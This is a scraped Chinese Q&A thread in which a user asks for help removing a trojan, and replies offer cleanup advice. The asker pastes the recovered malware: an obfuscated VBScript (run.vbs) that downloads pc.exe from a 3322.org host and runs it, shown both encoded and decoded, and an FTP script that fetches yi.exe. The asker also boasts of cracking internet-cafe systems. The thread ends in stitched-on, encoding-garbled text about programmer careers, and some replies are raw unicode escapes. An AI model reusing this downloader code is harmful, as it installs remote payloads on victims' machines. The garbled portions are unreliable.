一个困扰我这个高级程序员的挺牛的病毒或叫木马,达人请进!
\u627e\u4e00\u4e2a\u4eba\u3002\u662f\u7f8e\u5986\u8fbe\u4eba\u3002\u9999\u6e2f\u7684\u3002\u5973\u6027\u3002\u633a\u51fa\u540d\u7684\u3002\u4e0d\u8fc7\u6211\u5fd8\u4e86\u5979\u53eb\u4ec0\u4e48\u3002\u4e4b\u524d\u770b\u8fc7\u5979\u7684\u89c6\u9891\u7ed3\u5c3e\u6216\u8005\u5f00\u5934\u4f1a\u6709\u5927\u4f6cB, Bren Lui
\u8bd5\u4e0b\u5b89\u5168\u6a21\u5f0f\u6740\u770b\u770b
\u6e05\u9664\u7684\u65b9\u6cd5\u592a\u591a\u4e86\uff0c\u56e0\u4e3a\u76d7QQ\u4e00\u822c\u90fd\u662f\u4e9b\u4e00\u4e8b\u65e0\u6210\u7684\u5c0f\u5c0f\u5c0f\u83dc\u9e1f\u4eec\uff08\u989d`\u6216\u8005\u8bf4\u8fde\u83dc\u9e1f\u90fd\u4e0d\u662f\uff09\u4ed6\u4eec\u53ea\u4f1a\u4f7f\u7528\u4e00\u4e2a\u8f6f\u4ef6\u800c\u5df2\uff0c\u81f3\u4e8e\u7f16\u5199\u76d7\u53f7\u7a0b\u5e8f\u7684\u7a0b\u5e8f\u5458\u4eec\u66f4\u52a0\u4e0d\u8096\u4e8e\u53bb\u6d6a\u8d39\u65f6\u95f4\u505a\u505a\u8fd9\u4e2a\u4e1c\u897f\uff0c
\u6e05\u9664\u5de5\u5177\u8fd9\u91cc\u6211\u53ea\u63a8\u8350360\u5b89\u5168\u536b\u58eb
\u53e6\u5916\u8865\u5145\u4e00\u70b9\uff0c\u5982\u679c\u4f60\u79cd\u4e86\u75c5\u6bd2\uff0c\u6216\u4f60\u4e0d\u77e5\u9053\u81ea\u5df1\u662f\u4e0d\u662f\u79cd\u4e86\u75c5\u6bd2
\u6211\u53ef\u4ee5\u6559\u4f60\u600e\u4e48\u505a
1\uff1a
\u6d4b\u8bd5\u81ea\u5df1\u662f\u4e0d\u662f\u79cd\u75c5\u6bd2\u4e86\uff0c\u9996\u5148\u770bQQ\u767b\u9646\u7a97\u53e3\u7684 \u67e5\u6740\u75c5\u6bd2 \u6709\u6ca1\u6709\u6548\u3002\u5982\u679c\u70b9\u4e0d\u51fa\u6765 \u90a3\u4f60\u79cdQQ\u6728\u9a6c\u4e86
2\uff1a
\u5927\u5bb6\u77e5\u9053QQ\u73b0\u5728\u6700\u9ad8\u662f9\u4f4d\uff0c\u800cQQ\u767b\u9646\u7a97\u53e3\u8d26\u53f7\u680f\u6700\u9ad8\u4e5f\u53ea\u662f9\u4f4d\u3002
\u4f60\u53ef\u4ee5\u5c1d\u8bd5\u5728\u4e0a\u9762\u8f93\u516510\u4f4d\u4ee5\u4e0a\uff0c\u5982\u679c\u53ef\u4ee5\uff0c\u90a3\u4e48\u4f60\u4e5f\u79cdQQ\u6728\u9a6c\u4e86
3\uff1a\u5bc6\u7801\u6700\u9ad8\u662f16\u4f4d\uff0c\u540c\u4e0a \u8f93\u5165\u8d85\u8fc716\u4f4d\u4e5f\u4e3a\u79cd\u6728\u9a6c
4\uff1a
\u5728\u5f97\u77e5\u81ea\u5df1\u79cd\u6728\u9a6c\u540e\u5343\u4e07\u4e0d\u8981\u9a6c\u4e0a\u5728\u4f60\u8fd9\u53f0\u79cd\u4e86\u6728\u9a6c\u7684\u673a\u5668\u4e0a\u53bb\u901a\u8fc7\u5bc6\u7801\u4fdd\u62a4\u53bb\u4fee\u6539\u5bc6\u7801
\u3002\u53ef\u4ee5\u5230\u4e00\u53f0\u5b89\u5168\u7684\u673a\u5668\u4fee\u6539
5\uff1a
\u6e05\u695a\u6728\u9a6c\u540e\u91cd\u65b0\u88c5QQ \u8fd9\u65f6\u4f60\u5c31\u53ef\u4ee5\u653e\u5fc3\u767b\u9646\u4e86
一:寻找制作该病毒的人,问他原理,然后自己破解
二:去各大杀毒软件网站,询问里面研究病毒的人。
三:去各大黑客去的网站和论坛,请教他们
注:在百度知道里,估计你也只能找到像我们这样给你直接解决方法的人,而不是能告诉你原理的人。
楼主别以为自己是高级程序员,就等同自己是解决木马或病毒的高手
做病毒和木马的人比你这个高级程序员更加高级!你怎么可能用自己初级的水平来与之抗衡呢!
1、你恢复过c盘吗?没恢复过怎么知道恢复后还是不能解决呢?先试了再下结论!
2、当然恢复好后不要点任何一个盘,立刻更新杀软然后对全盘进行杀毒
只要不是最强的病毒,一般这样做已经能够杀死病毒。如果是最强的,正如你说的,可以通过重新对硬盘进行重新分区,至于你那些所谓重要的资料可以用移动硬盘拷出,弄好后在拷回来就行了。
3、有些清高的人,老是想走捷径来杀死病毒,但往往是杀了后又会自动重生,最终还不是要靠最简单的重装系统或重新对硬盘进行分区来解决吗?绕一大圈还是回到原点,还不是早点用简单方法呢!
4、如果该病毒并不能影响你的正常使用,你又何苦要杀掉它呢?比如说中了盗号木马,你没有什么可被人偷的,尽可以让他留着,等到自己实验的东西结束后再回过头干掉它!
这病毒很简单啊,闹的跟个啥似的!
首先,你的administrator必须要设密码
其次,你平时使用需要另外建一个用户,权限设为power user
那个run.vbs不就是一个autorun病毒么,把隐藏文件都打开就可以看到,一般都是三个一组,会把自身复制,名字是根目录下所有的文本文件,office文件的名字,这个脚本会在你每次双击打开驱动器的时候自动运行,所以,开机后不要双击运行,先杀毒
然后,检查服务,非基础服务一律禁止自动运行
最后,把开机自动启动里面的东西都清理掉,当然这个可以由360来代劳
另外:高级程序员不能说明啥!
*****************我是搂主*****************
新添的回答我看了。首先先谢谢大家。今天还在找他。我是学生所以有功夫弄这些。
首先谢谢。我这是我第一次在我的计算机上中病毒。所以认真了点。本来我就是搞技术,对这些有些敏感,我又是学生时间多点。
***streng扫描结果***发到我的空间里:http://hi.baidu.com/edzjx/blog。(空间是刚激活的,因为日志文件太大,我分了两个,所以不方便方单个网址,以前的问题补充也放到日志里了。)
***这里不可以更改多次,以后都到空间补充问题了。***
***我在楼下进行一个补充,主要是我找到的两个病毒脚本源码。
1)今天我用Wsyscheck,steng,微点分析了一下。找到一些好像三个木马的dll文件,可能被它删了,后来我找不到了。
2)我今天用瑞星,卡巴,金山进行了在线扫描。瑞星找到一个跟微点分析的是一样的。但不知道怎么回事,扫到一半就自动重启了。不过,我机器不太稳定。开了这个么多在线扫描,CUP吃不消。
3)我今天好好找了一下,系统目录下,最近生成的文件,找到三个VB脚本源码。其中一个还用工具将源码用ASCII码隐藏了原文。我在楼下给出了回答。一个被我删除了,找不到,只留下两个。
********源码里有远程地址及端口***********明天我会好好分析它们。
5)我空间里只放了这个问题补充,这里讨论是在不方便,有兴趣可以到那里讨论。我会把找的现象和心得在那里和大家分享。
对于jy00536463 ,说实话看了你的话心里不太舒服。不过也不无道理。主要是看问题的方面性。你想的是解决办法,重结果,而我反之,我重过程,当然有一些情感因素在里面,这就可能是年轻人,天不怕地不怕,血气方刚。我有一句,我年轻我怕谁。
另外对你说一下,我以前弄过“黑”,我也破过一些大网吧的系统,对现在的很多黑客,真不敢苟同,他们已经不再是红客网里的前辈了,很多而是用着前人东西利字当头的人。别以为他们多厉害,很多都是半路出家,你有那些工具你也是高手。
两个字悲哀,我们这些专心技术永远在被剥削的最底层。想到印度都赶上我们。我又有何可说。
下面是我找到一些病毒源码。感兴趣大家看看。
/****************************************************************/
/*文件名:run.vbs**************************/
/*目 录:system32************************/
/*说 明:代码部分被用ASCII码代替,已经用翻译过来*/
set oshell = wscript.createobject (Chr(87)+Chr(115)+Chr(99)+Chr(114)+Chr(105)+Chr(112)+Chr(116)+Chr(46)+Chr(115)+Chr(104)+Chr(101)+Chr(108)+Chr(108))
Set xPost = CreateObject(Chr(77)+Chr(105)+Chr(99)+Chr(114)+Chr(111)+Chr(115)+Chr(111)+Chr(102)+Chr(116)+Chr(46)+Chr(88)+Chr(77)+Chr(76)+Chr(72)+Chr(84)+Chr(84)+Chr(80))
xPost.Open Chr(71)+Chr(69)+Chr(84),Chr(104)+Chr(116)+Chr(116)+Chr(112)+Chr(58)+Chr(47)+Chr(47)+Chr(102)+Chr(97)+Chr(110)+Chr(102)+Chr(97)+Chr(110)+Chr(55)+Chr(48)+Chr(46)+Chr(51)+Chr(51)+Chr(50)+Chr(50)+Chr(46)+Chr(111)+Chr(114)+Chr(103)+Chr(58)+Chr(49)+Chr(49)+Chr(47)+Chr(97)+Chr(47)+Chr(112)+Chr(99)+Chr(46)+Chr(101)+Chr(120)+Chr(101),Chr(48)
xPost.Send()
Set sGet = CreateObject(Chr(65)+Chr(68)+Chr(79)+Chr(68)+Chr(66)+Chr(46)+Chr(83)+Chr(116)+Chr(114)+Chr(101)+Chr(97)+Chr(109))
sGet.Mode = Chr(51)
sGet.Type = Chr(49)
sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile Chr(50)+Chr(48)+Chr(48)+Chr(56)+Chr(46)+Chr(101)+Chr(120)+Chr(101),Chr(50)
oshell.run Chr(50)+Chr(48)+Chr(48)+Chr(56)+Chr(46)+Chr(101)+Chr(120)+Chr(101)
set oshell = wscript.createobject (Wscript.shell)
Set xPost = CreateObject(Microsoft.XMLHTTP)
xPost.Open GET,http://fanran70.3322.org:11/a/pc.exe,0
xPost.Send()
Set sGet = CreateObject(ADODB.Stream)
sGet.Mode = 3
sGet.Type = 1
sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile 2008.exe,2
oshell.run 2008.exe
/*******************/
/*文件名:mine.txt*********/
/*目 录:system32**************/
open cyliok.3322.org
34432763
123456
get yi.exe
bye
要SREng 、这里下就可以了、SREng官方下载、多国语言、http://www.kztechs.com/sreng/download.html
SREng,全名System Repair Engineer(SREng):一般翻译为系统修复工程师,
楼主既是---------- 高级程序员——软件设计师,
那咱就别班门弄斧了、这方面你远比我们专业、你试一下这两个反间谍软件软件吧、如不行我们也帮不了的、还有 用“冰刃”可以定位某一个进程的具体位置的、楼主也可试一下、
冰刃下载、(有些杀软对冰刃会有报“毒”的情况、如卡巴对冰刃就会报“可疑程序”)http://ttian.net/download/20071115/60.html
一、反间谍软件Windows Defender中文版,此软件是一款由微软公司所出的免费反间谍软件。
新浪网 支持Windows XP SP2和2003 Vista 下载:微软Windows Defender中文版http://tech.sina.com.cn/s/s/2007-05-11/17301503199.shtml
二、移走间谍软件Spyware Doctor 5.5.0.178多国语言 它可以检查并从你的电脑移走间谍软件、广告软件、木马程序、键盘记录器和追踪威胁等移除,忽视或隔离识别出来的间谍软件。新浪网下载。http://down1.tech.sina.com.cn/download/downContent/2004-09-24/11580.shtml
恩。问题很严重,情况很危险。
已经被黑了。
把重要东西备份一下,重做系统吧,不然很难保证系统是否干净,已经被人黑进去了,难免会再多留下个门。
高危险。防不胜防。
绛旓細鎴戣寰椾粬浠殑鐢熸椿鐘舵佽繕鏄瘮杈冩偁闂茬殑锛屽洜涓轰粬浠凡缁忛兘杩囦簡閭d釜绻佸繖鐨勯樁娈点傛垜浠兘鐭ラ亾鍋涓涓▼搴忓憳浠栦滑鐨勬椂闂存槸闈炲父绱ц揩鐨勶紝鑰屼笖鍦ㄤ粬浠勾杞荤殑鏃跺欎篃鏄粬浠嫾鎼忕殑澶уソ鏃舵湡銆傛垜浠兘鐭ラ亾浣滀负涓涓▼搴忓憳浠栦滑鐨勬棩甯稿伐浣滃氨鏄潗鍦ㄧ數鑴戦潰鍓嶆墦浠g爜锛岀數鑴戝氨鏄粬浠殑鍙︿竴鍗婏紝浠栦滑涔熶笌鐢佃剳鎺ヨЕ鐨勬椂闂存渶闀匡紝鎵浠ュ洜涓轰粬浠...
绛旓細涓嬮潰鍒嗕韩鎴戝枩娆㈢殑鍑犱綅鐗涢煎コ绋嬪簭鍛銆1锛孏race Hopper锛1949骞碒opper鍔犵洘鐢辩涓鍙扮數瀛愯绠楁満ENIAC鍙戞槑浜哄焹鍏嬬壒鍜岃帿榻愬埄寮鍔炵殑鐢佃剳鍏徃锛屼负绗竴鍙板瓨鍌ㄧ▼搴忕殑鍟嗕笟鐢靛瓙璁$畻鏈篣NIAC缂栧啓杞欢銆1952骞达紝濂瑰紑鍙戜簡涓栫晫涓婄涓涓皢楂樼骇绗﹀彿璇█杞彉涓烘満鍣ㄨ瑷鐨勭紪璇戝櫒A--0锛岀浜屽勾濂瑰張寮鍙戝嚭绗竴涓鐞嗘暟鎹绠楃殑...
绛旓細鍦ㄨ亴涓氶夋嫨涓,寰堝浜洪兘浼氶棶涓涓棶棰,杩欎釜鑱屼笟鏈変粈涔堝嚭璺?鎯冲緱鍒版纭殑鍥炵瓟,蹇呴』鍏堟悶娓呮,鑷繁绌剁珶鎯冲緱鍒颁粈涔堜笢瑗裤傚浜绋嬪簭鍛樿繖涓鑱屼笟,濡傛灉浣犺鐨勬槸閽,寰堝鐨勯挶,绋嬪簭鍛樻病鏈夊嚭璺;绋嬪簭鍛樺伐浣滅箒蹇,鏈夋椂涓嶈寰,杩炵画鐫鍔犵彮寰堟湁鍙兘,濡傛灉浣犺鐨勬槸浼戦棽鐨勭敓娲,绋嬪簭鍛樻病鏈夊嚭璺;绋嬪簭鍛橀兘鏄笌鐢佃剳鎵撲氦閬,宸ヤ綔灏辨槸鍧愮潃,...
绛旓細鍙槸鎶婃墍鏈夌殑涓滆タ锛岀粡楠屽埢鍦ㄨ剳娴烽噷浜嗭紝瀵硅繖椤瑰伐浣滃吇鎴愪簡绫讳技閭g鍏堝ぉ鍙嶅簲涓鏍凤紝瀵逛簬鍜变滑杩欐牱鐨勫垵瀛﹁呬粈涔堜篃娌℃湁锛屾墍浠ュ挶浠崈涓囦笉瑕佽嚜鍗戯紝鐜板湪鎴戜笉鍦ㄥ叕鍙稿共浜嗭紝鑷繁鍔炰簡涓涓伐浣滃锛屽叾瀹炵▼搴忚繖涓琛屽氨鏄(缁忛獙锛岃浣忎竴鍙ヨ瘽锛屽彧鏈変細鎽哥储鐨绋嬪簭鍛鎵嶄細璧板埌鍓嶉潰銆備笉...
绛旓細杩欎笘鐣屼笂楂樿柂鏀跺叆鐨勮亴涓氭湁寰堝锛屽苟涓嶄粎浠呮槸绋嬪簭鍛銆備絾鏄苟涓嶆槸姣忎竴涓湁閽变汉閮介渶瑕佹嬁鍑烘潵鐐涓涓嬶紝鍙湁鏋佸皯鏁颁汉鎵嶄細鏈夐偅绉嶆兂瑕佺偒鑰鐨勫績鐞嗭紝鎵浠ヨ绋嬪簭鍛樹笉鐐瘜锛岃繖鏄竴浠堕潪甯告甯哥殑浜嬫儏锛屽彲鑳戒汉瀹朵篃涓嶆兂璁╁ぇ瀹剁煡閬撹嚜宸遍潪甯告湁閽卞惂锛屾瘯绔熶綆璋冩槸涓浗浜虹殑鎬ф牸鍢涖傞鍏堬紝鏈閲嶈鐨勫師鍥犲氨鏄▼搴忓憳鎷垮埌杩欎釜宸ヨ祫...
绛旓細缂栫▼鍙兘灏辨槸鍐欎竴浜涚畻娉曪紝閫掑綊锛岃В鍐充竴涓8鐨囧悗闂锛岃В鍐充竴涓眽璇哄闂銆備絾鏄秹鍙婂埌杞欢浠ュ強宸ョ▼鏂归潰锛屼竴鍒囬兘鍙樹簡銆傝岀湡姝h兘澶熼┚椹ぇ瑙勬ā绯荤粺鐨勪汉锛屾湰韬紝缁濆涓嶅彲鑳戒笉绮鹃氬紑鍙戝拰缂栫▼鐨勩備篃鏈夌綉鍙嬭锛屸滃湪鎴28宀佺殑鏃跺欙紝鎴戞媴蹇30宀侊紝缁撴灉鍒颁簡30宀侊紝鎴戣繕鏄绋嬪簭鍛锛岀劧鍚庢垜鍙堝紑濮嬫媴蹇35宀侊紝绛夊埌浜35宀侊紝鍙戠幇...
绛旓細9銆绋嬪簭鍛鐢风敓锛岃秴鏈夎愬績锛佷笉鏂彉鏇寸殑闇姹傛瀬澶у湴纾ㄧ粌浜嗕粬浠殑蹇冩櫤 鏃犳暟涓粠0鍒1鐨勯」鐩敾鐐间簡浠栦滑鐨勮愬績 鑱屼笟涔犳儻璧嬩簣浜嗕粬浠緢濂界殑鐢熸椿鎬佸害 浠栦滑涓嶇晱鎯т换浣曢毦棰橈紝鐩撮潰闂銆佽繋闅捐屼笂鐨勬佸害 杩樻湁 鍐嶆湁浜鸿绋嬪簭鍛樿剳瀛愬憜鏉挎垜灏辨墦浜轰簡锛佹潵锛侀敭鐩樼粰浣狅紝瀹囧畽IDE缁欎綘锛岃兘鍐欏嚭涓娈垫湁瀹屾暣閫昏緫鐨勭▼搴忔潵灏辩畻鎴...
绛旓細濡傛灉鏈塉ava,Android,H5绛夊紑鍙戞柟闈㈢殑闂锛屾垨鑰呮槸寮鍙戞眰鑱屾柟闈㈢殑闂锛岄兘鍙互鍦ㄨ瘎璁哄尯鐣欒█锛屾垨鑰呯淇℃垜銆傚掍篃涓嶆槸瀹屽叏涓嶈銆傚綋浣犺冻澶熺墰閫肩殑鏃跺欙紝浣犵殑鑱屼笟鐢熸动鏄彲浠ュ欢闀跨殑銆傚綋鐒朵簡锛屽浗鍐呭ぇ閮ㄥ垎绋嬪簭鍛鍋氬埌浠婂ぉ杩樻病鏈夊埌閫浼戝勾榫勪篃鏄涓尯涓昏鐨勫師鍥犮侷T琛屼笟鏇存柊杩唬杩樻槸姣旇緝蹇殑锛屽浜庡ぇ閮ㄥ垎绋嬪簭鍛樻潵璁诧紝鍦...
绛旓細鍥犱负浣滀负涓涓瀵艰呬綘涓嶄粎闇瑕佸崗璋冨伐浣滀綘杩橀渶瑕佸叧蹇冨憳宸ャ傛墍浠ユ垜浠彲浠ユ帰璁ㄤ竴涓嬭吘璁侀樋閲屽反宸淬佸崕涓哄摢瀹剁殑绋嬪簭鍛鎶鏈洿鍘夊锛屽叾瀹炲湪鎴戠殑璁ょ煡閲岋紝鎴戣涓鸿吘璁殑绋嬪簭鍛樻洿鍘夊锛屽洜涓鸿吘璁殑绋嬪簭鍛橀渶瑕佸紑鍙戠殑鏂瑰悜澶氶毦搴﹀ぇ锛岃屼笖鑵捐鐨勬暣涓郴缁熺殑浼樺寲涓嶆槸闈犱釜鍒嚑涓珮鎶鏈▼搴忓憳灏辫兘瀹屾垚鐨勶紝鑰屼笖鑵捐鏄竴涓富鎵撴父鎴...
绛旓細鑷充粖杩樻病瑙夊緱鎬濈淮璺熶笉涓婃垨鑰呯簿鍔涗笉澶燂紝鍙嶅掓槸寮鍙戞柟闈㈣交鏉句簡寰堝銆傚洜涓鸿剳瀛愰噷鍙夋柟妗堝緢澶氾紝鎵浠ユ湁浜涘埆浜鸿鑺变竴澶╃殑宸ヤ綔锛屾垜鎹釜鎬濊矾鍙兘涓ゅ皬鏃跺氨鎼炲畾浜嗭紱闀挎湡鎶揃UG鍏绘垚浜嗗瓧绗︾骇鐪肩潧锛屽緢灏戠姱浣庣骇閿欒锛涘緢灏戦捇鐗涜灏栵紱瀵规煇浜涚湅浼煎鏉傜殑璁捐鍙互鍋氬埌涓鐩簡鐒躲佷竴姝ュ埌浣嶏紱鍏磋叮骞挎硾锛岀煡璇嗙殑浣撶郴鍖栫▼搴﹁緝楂橈紝...
